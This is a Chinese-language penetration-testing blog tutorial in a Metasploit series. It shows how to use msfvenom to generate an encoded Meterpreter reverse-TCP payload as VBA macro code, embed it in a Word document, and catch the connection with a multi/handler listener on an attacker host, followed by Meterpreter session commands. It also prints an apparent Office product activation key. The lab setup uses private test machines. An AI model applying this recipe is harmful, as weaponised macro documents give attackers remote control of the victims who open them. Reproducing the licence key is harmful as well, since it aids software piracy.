Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透4 —利用宏感染 word 文档获取 shell

目录

利用宏感染 word 文档获取 shell

(1)win7安装office2007

(2)msfvenom生成木马 --宏代码和payload

(3)office新建文档并配置宏和payloads

(4)MSF 配置侦听,生成session


Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

利用宏感染 word 文档获取 shell

总结:

                (1)win7安装office2007

                (2)msfvenom生成木马 --宏代码和payload

                (3)office新建文档(内容都可),文档中建宏(生成的木马宏代码复制进去)并将payload(生成的木马payload)复制进文档

                (4)MSF 配置侦听

                        ————利用exploit/multi/handler模块,设置payload为windows/meterpreter/reverse_tcp,攻击建立session会话

(1)win7安装office2007

将 cn_office_professional_plus_2007_dvd_X12-38713.rar 上传到 win7 虚拟上,解压后, 安装 office。

office 的激活码: DBXYD-TF477-46YM4-W74MH-6YDQ8

(2)msfvenom生成木马 --宏代码和payload

root@zwzj:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.234.141 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

——msfvenom生成木马,执行完成后会生成 2 段代码

第一段代码是 MACRO CODE [ˈmækrəʊ kəʊd] 宏代码

第二段代码 payload,从PAYLOAD DATA开始一直最后。

(3)office新建文档并配置宏和payloads

复制宏代码,打开msoffice word新建宏

复制第一段 code 代码内容到编辑器中,保存后关闭宏编辑器窗口即可。

复制第二段代码 payload 到 word 正文,然后另存为文档。

另存为

(4)MSF 配置侦听,生成session

msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.234.141

msf6 exploit(multi/handler) > jobs -K

msf6 exploit(multi/handler) > exploit

配置好侦听之后我们打开我们制作的 word 文档,文档一旦打开就会执行 payload 连接到 MSF,关闭 word 文档之后 session 不受影响

允许运行宏:

打开之后回到 MSF 控制台,会发现Session 已经建立,但是我的电脑报错(路径/文件访问错误—宏代码的问题,所以我就不做修改了,如果代码路径等正确,msf会出现会话

meterpreter > getuid

Server username: WIN- \zj

我们尝试把 payload 转移到其他进程

meterpreter > getpid ——获取当前进程 pid

Current pid: 212

meterpreter > ps ———查看进程列表,在 ps 列出的进程列表,倒数第 3 个就是我们进程的 pid

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值